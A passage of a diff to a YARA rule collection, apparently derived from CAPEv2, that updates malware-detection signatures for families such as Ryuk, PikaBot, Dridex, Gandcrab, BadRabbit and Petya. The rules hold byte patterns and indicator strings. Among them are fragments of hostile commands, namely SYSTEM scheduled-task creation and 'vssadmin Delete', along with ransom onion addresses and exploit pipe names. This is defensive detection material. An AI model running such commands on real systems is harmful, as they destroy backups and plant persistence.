"https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Ryuk.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c" score = 75 quality = 70 tags = "FILE" - cape_type = "DoppelPaymer Payload" + cape_type = "Ryuk Payload" strings: - $getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3} - $cmd_string = "Setup run\\n" wide + $ext = ".RYK" wide + $readme = "RyukReadMe.txt" wide + $main = "InvokeMainViaCRT" + $code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and 3 of ($*) } -rule CAPE_Gandcrab : FILE +rule CAPE_Smokeloader_1 { meta: - description = "Gandcrab Payload" + description = "SmokeLoader Payload" author = "kevoreilly" - id = "0082e8c9-952e-508c-a438-4e17b8031864" - date = "2022-06-09" - modified = "2022-06-09" + id = "a67e2649-72cc-5dea-aea7-8783146d2979" + date = "2023-02-06" + modified = "2023-02-06" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Gandcrab.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/SmokeLoader.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "a2ed982f15a6c687da2fdba216868016722825edf7e8ff6a75f24d81af8276bc" score = 75 quality = 70 - tags = "FILE" - cape_type = "Gandcrab Payload" + tags = "" + cape_type = "SmokeLoader Payload" strings: - $string1 = "GDCB-DECRYPT.txt" wide - $string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit" - $string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide - $string4 = "KRAB-DECRYPT.txt" wide + $rc4_decrypt64 = {41 8D 41 01 44 0F B6 C8 42 0F B6 [2] 41 8D 04 12 44 0F B6 D0 42 8A [2] 42 88 [2] 42 88 [2] 42 0F B6 [2] 03 CA 0F B6 C1 8A [2] 30 0F 48 FF C7 49 FF CB 75} + $rc4_decrypt32 = {47 B9 FF 00 00 00 23 F9 8A 54 [2] 0F B6 C2 03 F0 23 F1 8A 44 [2] 88 44 [2] 88 54 [2] 0F B6 4C [2] 0F B6 C2 03 C8 81 E1 FF 00 00 00 8A 44 [2] 30 04 2B 43 3B 9C 24 [4] 72 C0} + $fetch_c2_64 = {00 48 8D 05 [3] FF 48 8B CB 48 8B 14 D0 48 8B 5C 24 ?? 48 83 C4 20 5F E9} + $fetch_c2_32 = {8B 96 [2] (00|01) 00 8B CE 5E 8B 14 95 [4] E9} condition: - uint16(0)==0x5A4D and any of ($string*) + 2 of them } -rule CAPE_Rozena +rule CAPE_Pikabotloader : FILE { meta: - description = "No description has been set in the source file - CAPE" - author = "Kevin O'Reilly" - id = "38ca9da3-2a0e-500f-8eb8-9de69a7f2da5" - date = "2024-03-15" - modified = "2024-03-15" + description = "Pikabot Loader" + author = "kevoreilly" + id = "e2c89cdd-0cdb-5367-8aae-2fe685eff972" + date = "2024-03-13" + modified = "2024-03-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Rozena.yar#L1-L10" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "c415a8108b58a125a604031bb8d73b58a8aae5429b5b765e35fa8a4add9cd135" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/PikaBot.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "7e5f1f2911545ee6bd36b54f2627fbdec1b957f4b91df901dd1c6cbd4dff0231" score = 75 quality = 70 - tags = "" - cape_type = "Rozena Payload" + tags = "FILE" + cape_type = "PikaBot Loader" strings: - $ip_port = {FF D5 6A 0A 68 [4] 68 [4] 89 E6 50 50 50 50 40 50 40 50 68 [4] FF D5} - $socket = {6A 00 6A 04 56 57 68 [4] FF D5 [0-5] 8B 36 6A 40 68 00 10 00 00 56 6A 00 68} + $indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1} + $sysenter1 = {89 44 24 08 8D 85 ?? FC FF FF C7 44 24 04 FF FF 1F 00 89 04 24 E8} + $sysenter2 = {C7 44 24 0C 00 00 00 02 C7 44 24 08 00 00 00 02 8B 45 0C 89 44 24 04 8B 45 08 89 04 24 E8} condition: - all of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Darkgate +rule CAPE_Pikabot : FILE { meta: - description = "DarkGate Payload" - author = "enzok" - id = "ce81f452-4096-51d6-97cc-624f9fbefa86" - date = "2024-02-26" - modified = "2024-02-26" + description = "Pikabot Payload" + author = "kevoreilly" + id = "140a3e20-9837-5f66-85dc-af278d75e074" + date = "2024-03-13" + modified = "2024-03-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/DarkGate.yar#L1-L16" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "25c0e77a83676c6a18445f8df0b1f7a9148de5f64eeb532f9a4f4d4652dd8191" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/PikaBot.yar#L15-L28" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "ed07217c373831a9a67d914854154988696e6fcea70dedabf333385f0e7bb8b7" score = 75 quality = 70 - tags = "" - cape_type = "DarkGate Payload" + tags = "FILE" + cape_type = "PikaBot Payload" + packed = "89dc50024836f9ad406504a3b7445d284e97ec5dafdd8f2741f496cac84ccda9" strings: - $part1 = {8B 55 ?? 8A 4D ?? 80 E1 3F C1 E1 02 8A 5D ?? 80 E3 30 81 E3 FF [3] C1 EB 04 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40} - $part2 = {8B 55 ?? 8A 4D ?? 80 E1 0F C1 E1 04 8A 5D ?? 80 E3 3C 81 E3 FF [3] C1 EB 02 02 CB 88 4C 10 FF FF 45 ?? 80 7D ?? 40} - $part3 = {8B 55 ?? 8A 4D ?? 80 E1 03 C1 E1 06 8A 5D ?? 80 E3 3F 02 CB 88 4C 10 FF FF 45} - $alphabet = "zLAxuU0kQKf3sWE7ePRO2imyg9GSpVoYC6rhlX48ZHnvjJDBNFtMd1I5acwbqT+=" - $config1 = {B9 01 04 00 00 E8 [4] 8D 45} - $config2 = {8B 55 ?? 8D 45 ?? E8 [4] 8D 45 ?? 5? B? 06 00 00 00 B? 01 00 00 00 8B 45 ?? E8 [4] 8B 45 ?? B? [4] E8 [4] 75} + $decode = {29 D1 01 4B ?? 8D 0C 10 89 4B ?? 85 F6 74 02 89 16} + $indirect = {31 C0 64 8B 0D C0 00 00 00 85 C9 74 01 40 50 8D 54 24 ?? E8 [4] A3 [4] 8B 25 [4] A1} + $config = {C7 44 24 [3] 00 00 C7 44 24 [4] 00 89 [1-4] ?? E8 [4] 31 C0 C7 44 24 [3] 00 00 89 44 24 ?? C7 04 24 [4] E8} condition: - ($alphabet) and ( any of ($part*) or all of ($config*)) + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Conti : FILE +rule CAPE_Pik23 : FILE { meta: - description = "Conti Ransomware" + description = "PikaBot Payload February 2023" author = "kevoreilly" - id = "c94aed07-0eaf-5b51-a81e-e1992543673a" - date = "2021-03-15" - modified = "2021-03-15" + id = "fc804c63-fc6c-5b26-92b1-aa5d2fbc4917" + date = "2024-03-13" + modified = "2024-03-13" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Conti.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "c9842f93d012d0189b9c6f10ad558b37ae66226bbb619ad677f6906ccaf0e848" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/PikaBot.yar#L30-L44" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + hash = "59f42ecde152f78731e54ea27e761bba748c9309a6ad1c2fd17f0e8b90f8aed1" + logic_hash = "71a71df2f2a075294941c54eed06cafaaa4d3294e45b3a0098c1cffddd0438bc" score = 75 quality = 70 tags = "FILE" - cape_type = "Conti Payload" + cape_type = "PikaBot Payload" strings: - $crypto1 = {8A 07 8D 7F 01 0F B6 C0 B9 ?? 00 00 00 2B C8 6B C1 ?? 99 F7 FE 8D [2] 99 F7 FE 88 ?? FF 83 EB 01 75 DD} - $website1 = "https://contirecovery.info" ascii wide - $website2 = "https://contirecovery.best" ascii wide + $rdtsc = {89 55 FC 89 45 F8 0F 31 89 55 F4 89 45 FC 33 C0 B8 05 00 00 00 C1 E8 02 2B C3 3B C1 0F 31 89 55 F0 89 45 F8 8B 44 8D} + $int2d = {B8 00 00 00 00 CD 2D 90 C3 CC CC CC CC CC CC CC} + $subsys = {64 A1 30 00 00 00 8B 40 18 C3} + $rijndael = {EB 0F 0F B6 04 3? FE C? 8A 80 [4] 88 04 3? 0F B6 [3] 7C EA 5? 5? C9 C3} condition: - uint16(0)==0x5A4D and any of them + uint16(0)==0x5A4D and 3 of them } -rule CAPE_Squirrelwaffle : FILE +rule CAPE_Dridexv4 : FILE { meta: - description = "No description has been set in the source file - CAPE" - author = "kevoreilly & R3MRUM" - id = "0ae75f24-7a2a-57d3-8c6f-a61ac6cc08e7" - date = "2021-10-13" - modified = "2021-10-13" + description = "Dridex v4 Payload" + author = "kevoreilly" + id = "c396f664-9f0d-50ac-bce8-33fd8712645a" + date = "2022-05-31" + modified = "2022-05-31" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/SquirrelWaffle.yar#L1-L11" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "5f799333398421d537ec7a87ca94f6cc9cf1e53e55b353036a5132440990e500" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/DridexV4.yar#L1-L15" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "cb103fe5f2d4792e3c612db4e2d84a4c8b0ce0f9a8443e9147e2c345f1dbdff6" score = 75 quality = 70 tags = "FILE" - cape_type = "SquirrelWaffle Payload" + cape_type = "DridexV4 Payload" strings: - $code = {8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39 8D 4D ?? 0F B6 C0 50 6A 01 E8 [4] C6 45} - $decode = {F7 75 ?? 83 7D ?? 10 8D 4D ?? 8D 45 ?? C6 45 ?? 00 0F 43 4D ?? 83 7D ?? 10 0F 43 45 ?? 8A 04 10 32 04 39} + $decrypt32 = {6A 40 58 3B C8 0F 4D C1 39 46 04 7D 50 53 57 8B F8 81 E7 3F 00 00 80 79 05 4F 83 CF C0 47 F7 DF 99 1B FF 83 E2 3F 03 C2 F7 DF C1 F8 06 03 F8 C1 E7 06 57} + $getproc32 = {81 FB ?? ?? ?? ?? 74 2D 8B CB E8 ?? ?? ?? ?? 85 C0 74 0C 8B C8 8B D7 E8 ?? ?? ?? ?? 5B 5F C3} + $getproc64 = {81 FB ?? ?? ?? ?? 75 04 33 C0 EB 2D 8B CB E8 ?? ?? ?? ?? 48 85 C0 75 17 8B CB E8 ?? ?? ?? ?? 84 C0 74 E5 8B CB E8 ?? ?? ?? ?? 48 85 C0 74 D9 8B D7 48 8B C8 E8 ?? ?? ?? ?? 48 8B 5C 24 30 48 83 C4 20 5F C3} + $bot_stub_32 = {8B 45 E? 8? [5-13] 8A 1C 0? [6-15] 05 FF 00 00 00 8B ?? F? 39 ?? 89 45 E? 72 D?} + $bot_stub_64 = {8B 44 24 ?? 89 C1 89 CA 4C 8B 05 [4] 4C 8B 4C 24 ?? 45 8A 14 11 83 E0 1F 89 C0 41 89 C3 47 2A 14 18 44 88 54 14} condition: - uint16(0)==0x5A4D and all of them + uint16(0)==0x5A4D and any of them } rule CAPE_Kronos : FILE { @@ -113935,8 +115758,8 @@ rule CAPE_Kronos : FILE date = "2020-07-02" modified = "2020-07-02" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Kronos.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Kronos.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" logic_hash = "52ce9caf3627efe8ae86df6ca59e51e9f738e13ac0265f797e8d70123dbcaeb3" score = 75 quality = 70 @@ -113952,445 +115775,430 @@ rule CAPE_Kronos : FILE condition: uint16(0)==0x5A4D and (2 of ($a*)) } -rule CAPE_Ryuk : FILE +rule CAPE_Nanolocker : FILE { meta: - description = "Ryuk Payload" + description = "NanoLocker Payload" author = "kevoreilly" - id = "594bbb8d-1f85-5a01-a864-ac2d95c45bf9" + id = "6fff6a27-a153-5461-9a75-2253c2f7d408" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Ryuk.yar#L1-L14" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "b4463993d8956e402b927a3dcfa2ca9693a959908187f720372f2d3a40e6db0c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/NanoLocker.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "fe6c8a4e259c3c526f8f50771251f6762b2b92a4df2e8bfc705f282489f757db" score = 75 quality = 70 tags = "FILE" - cape_type = "Ryuk Payload" + cape_type = "NanoLocker Payload" strings: - $ext = ".RYK" wide - $readme = "RyukReadMe.txt" wide - $main = "InvokeMainViaCRT" - $code = {48 8B 4D 10 48 8B 03 48 C1 E8 07 C1 E0 04 F7 D0 33 41 08 83 E0 10 31 41 08 48 8B 4D 10 48 8B 03 48 C1 E8 09 C1 E0 03 F7 D0 33 41 08 83 E0 08 31 41 08} + $a1 = "NanoLocker" + $a2 = "$humanDeadline" + $a3 = "Decryptor.lnk" condition: - uint16(0)==0x5A4D and 3 of ($*) + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Hermes : FILE +rule CAPE_Varenyky : FILE { meta: - description = "Hermes Payload" + description = "Varenyky Payload" author = "kevoreilly" - id = "0ff44422-9c14-517b-9e71-8e9e19694f06" + id = "e01695fa-72a0-5d8e-86ab-8c909d28b8ec" date = "2019-10-30" modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Hermes.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "9bc974173f39a57e7adfbf8ae106a20d960557696b4c3ce16e9b4e47d3e9e95b" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Varenyky.yar#L1-L11" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "602f1b8b60b29565eabe2171fde4eb58546af68f8acecad402a7a51ea9a08ed9" score = 75 quality = 70 tags = "FILE" - cape_type = "Hermes Payload" + cape_type = "Varenyky Payload" strings: - $ext = ".HRM" wide - $vss = "vssadmin Delete" - $email = "supportdecrypt@firemail.cc" wide + $onion = "jg4rli4xoagvvmw47fr2bnnfu7t2epj6owrgyoee7daoh4gxvbt3bhyd.onion" condition: - uint16(0)==0x5A4D and all of ($*) + uint16(0)==0x5A4D and ($onion) } -rule CAPE_Socks5Systemz : FILE +rule CAPE_Kpot : FILE { meta: - description = "Socks5Systemz Payload" + description = "Kpot Stealer" author = "kevoreilly" - id = "75831382-bb43-554e-93b1-f54a2255d8b9" - date = "2024-05-22" - modified = "2024-05-22" + id = "724fd6ac-e734-5952-b459-01cbaffdb89d" + date = "2020-10-19" + modified = "2020-10-19" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/Socks5Systemz.yar#L1-L18" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "44b83b6d2ab39b4258ae0d97d00d02afdbb62a3973fd788584e4dea9db69cc1b" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Kpot.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "75abaab9a10e8ac8808425c389238285ab9bd9cb76f0cd03cc1e35b3ea0a1b0f" score = 75 quality = 70 tags = "FILE" - cape_type = "Socks5Systemz Payload" - packed = "9b997d0de3fe83091726919a0dc653e22f8f8b20b1bb7d0b8485652e88396f29" + cape_type = "Kpot Payload" strings: - $chunk1 = {0F B6 84 8A [4] E9 [3] (00|FF)} - $chunk2 = {0F B6 04 8D [4] E9 [3] (00|FF)} - $chunk3 = {0F B6 04 8D [4] E9 [3] (00|FF)} - $chunk4 = {0F B6 04 8D [4] E9 [3] (00|FF)} - $chunk5 = {66 0F 6F 05 [4] E9 [3] (00|FF)} - $chunk6 = {F0 0F B1 95 [4] E9 [3] (00|FF)} - $chunk7 = {83 FA 04 E9 [3] (00|FF)} + $format = "%s | %s | %s | %s | %s | %s | %s | %d | %s" + $username = "username:s:" + $os = "OS: %S x%d" condition: - uint16(0)==0x5A4D and 6 of them + uint16(0)==0x5A4D and 2 of them } -rule CAPE_Badrabbit : FILE +rule CAPE_Gandcrab : FILE { meta: - description = "BadRabbit Payload" + description = "Gandcrab Payload" author = "kevoreilly" - id = "c7204772-6f14-57b7-88c1-e9156f9897d5" - date = "2019-10-30" - modified = "2019-10-30" + id = "0082e8c9-952e-508c-a438-4e17b8031864" + date = "2022-06-09" + modified = "2022-06-09" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/BadRabbit.yar#L1-L13" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "309e14ab4ea2f919358631f9d8b2aaff1f51e7708b6114e4e6bf4a9d9a5fc86c" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Gandcrab.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c" score = 75 quality = 70 tags = "FILE" - cape_type = "BadRabbit Payload" + cape_type = "Gandcrab Payload" strings: - $a1 = "caforssztxqzf2nm.onion" wide - $a2 = "schtasks /Create /SC once /TN drogon /RU SYSTEM" wide - $a3 = "schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal" wide + $string1 = "GDCB-DECRYPT.txt" wide + $string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit" + $string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide + $string4 = "KRAB-DECRYPT.txt" wide condition: - uint16(0)==0x5A4D and ( all of ($a*)) + uint16(0)==0x5A4D and any of ($string*) } -rule CAPE_Eternalromance : FILE +rule CAPE_Emotetloader : FILE { meta: - description = "EternalRomance Exploit" + description = "Emotet Loader" author = "kevoreilly" - id = "34035076-9dda-5e32-bd0b-d0257a96329b" - date = "2022-06-09" - modified = "2022-06-09" + id = "aea8ff2e-bdf7-5417-a41c-93566d1dd019" + date = "2022-05-31" + modified = "2022-05-31" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/EternalRomance.yar#L1-L33" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "5390fae3e2411a715cdc965df8648c0c4c511d53d5f76031714f1b784b58eb0d" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/EmotetLoader.yar#L1-L12" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "410872d25ed3a89a2cba108f952d606cd1c3bf9ccc89ae6ab3377b83665c2773" score = 75 - quality = 68 + quality = 70 tags = "FILE" - cape_type = "EternalRomance Exploit" + cape_type = "EmotetLoader Payload" strings: - $SMB1 = "Frag" - $SMB2 = "Free" - $session7_32_1 = {2A 02 1C 00} - $session7_64_1 = {2A 02 28 00} - $session8_32_1 = {2A 02 24 00} - $session8_64_1 = {2A 02 38 00} - $session7_32_2 = {D5 FD E3 FF} - $session7_64_2 = {D5 FD D7 FF} - $session8_32_2 = {D5 FD DB FF} - $session8_64_2 = {D5 FD C7 FF} - $ipc = "IPC$" - $pipe1 = "atsvc" - $pipe2 = "browser" - $pipe3 = "eventlog" - $pipe4 = "lsarpc" - $pipe5 = "netlogon" - $pipe6 = "ntsvcs" - $pipe7 = "spoolss" - $pipe8 = "samr" - $pipe9 = "srvsvc" - $pipe10 = "scerpc" - $pipe11 = "svcctl" - $pipe12 = "wkssvc" + $antihook = {8B 15 ?? ?? ?? ?? 03 15 ?? ?? ?? ?? 89 95 28 FF FF FF A1 ?? ?? ?? ?? 2D 4D 01 00 00 A3 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 3B 0D ?? ?? ?? ?? 76 26 8B 95 18 FF FF FF 8B 42 38} condition: - uint16(0)==0x5A4D and ( all of ($SMB*)) and $ipc and ( any of ($session*)) and ( any of ($pipe*)) + uint16(0)==0x5A4D and any of them } -rule CAPE_Petrwrap : FILE +rule CAPE_Petya : FILE { meta: - description = "PetrWrap Payload" + description = "Petya Payload" author = "kevoreilly" - id = "83762c87-6e96-50fe-b297-e1a5f893be43" - date = "2022-06-09" - modified = "2022-06-09" + id = "e581747c-c40f-5689-84b4-d55134b532f7" + date = "2019-10-30" + modified = "2019-10-30" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/PetrWrap.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "6dd1cf5639b63d0ab41b24080dad68d285f2e3969ad34fd724c83e7a0dd4b968" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/Petya.yar#L1-L13" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "f819261bb34f3b2eb7dc2f843b56be25105570fe902a77940a632a54fbe0d014" score = 75 quality = 70 tags = "FILE" - cape_type = "PetrWrap Payload" + cape_type = "Petya Payload" strings: - $a1 = "http://petya3jxfp2f7g3i.onion/" - $a2 = "http://petya3sen7dyko2n.onion" - $b1 = "http://mischapuk6hyrn72.onion/" - $b2 = "http://mischa5xyix2mrhd.onion/" + $a1 = "CHKDSK is repairing sector" + $a2 = "wowsmith123456@posteo.net" + $a3 = "1Mz7153HMuxXTuR2R1t78mGSdzaAtNbBWX" wide condition: - uint16(0)==0x5A4D and ( any of ($a*)) and ( any of ($b*)) + uint16(0)==0x5A4D and ( all of ($a*)) } -rule CAPE_Zerot : FILE +rule CAPE_Bruteratel { meta: - description = "ZeroT Payload" + description = "BruteRatel Payload" author = "kevoreilly" - id = "dc5dc18c-2ec6-541d-905c-42543f17b16d" - date = "2019-10-30" - modified = "2019-10-30" + id = "61b951e4-0c27-59c0-8ea2-715b673fdcee" + date = "2024-07-11" + modified = "2024-07-11" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/ZeroT.yar#L1-L15" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "f60ae25ac3cd741b8bdc5100b5d3c474b5d9fbe8be88bfd184994bae106c3803" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/BruteRatel.yar#L1-L14" + license_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/LICENSE" + logic_hash = "0984977c716d6f8e068c045166eb5db77c9fbce27513e555dceca348375f1a66" score = 75 - quality = 68 - tags = "FILE" - cape_type = "ZeroT Payload" + quality = 70 + tags = "" + cape_type = "BruteRatel Payload" strings: - $decrypt = {8B C1 8D B5 FC FE FF FF 33 D2 03 F1 F7 75 10 88 0C 33 41 8A 04 3A 88 06 81 F9 00 01 00 00 7C E0} - $string1 = "(*^GF(9042&*" - $string2 = "s2-18rg1-41g3j_.;" - $string3 = "GET" wide - $string4 = "open" + $syscall1 = {49 89 CA 4? 89 ?? (41 FF|FF)} + $syscall2 = {49 89 CA 48 8B 44 24 ?? FF 64 24} + $jmpapi = {49 89 ?? 10 49 C7 45 08 ?? 00 00 00 E8 00 00 00 00 ?? (48|49) 83 [2] 41 FF E2} + $decode = {89 C2 8A 14 17 40 38 EA 75 06 FF C0 89 03 EB 0B 41 88 14 08 48 FF C1 FF 03 EB} condition: - uint16(0)==0x5A4D and all of them + 2 of them } -rule CAPE_Ursnifv3 : FILE +rule CAPE_Lokibot : FILE { meta: - description = "UrsnifV3 Payload" + description = "LokiBot Payload" author = "kevoreilly" - id = "9dd32f80-b535-52a3-91e1-4db005362fd4" - date = "2023-03-23" - modified = "2023-03-23" + id = "8cdf69e2-ecac-5241-adba-c458cce0610f" + date = "2022-02-01" + modified = "2022-02-01" reference = "https://github.com/kevoreilly/CAPEv2" - source_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/data/yara/CAPE/UrsnifV3.yar#L1-L18" - license_url = "https://github.com/kevoreilly/CAPEv2/blob/d7c86e399cc6686df6b065f1a9a79193cc88d0c7/LICENSE" - logic_hash = "501cd52388aba16f9d33b4555f310e1ad58326916b15358a485c701acb87abd8" + source_url = "https://github.com/kevoreilly/CAPEv2/blob/4d96d6a10c48fb0f19472ea18715cb1cd8d35da3/data/yara/CAPE/LokiBot.yar#L1-L12" + license_url = 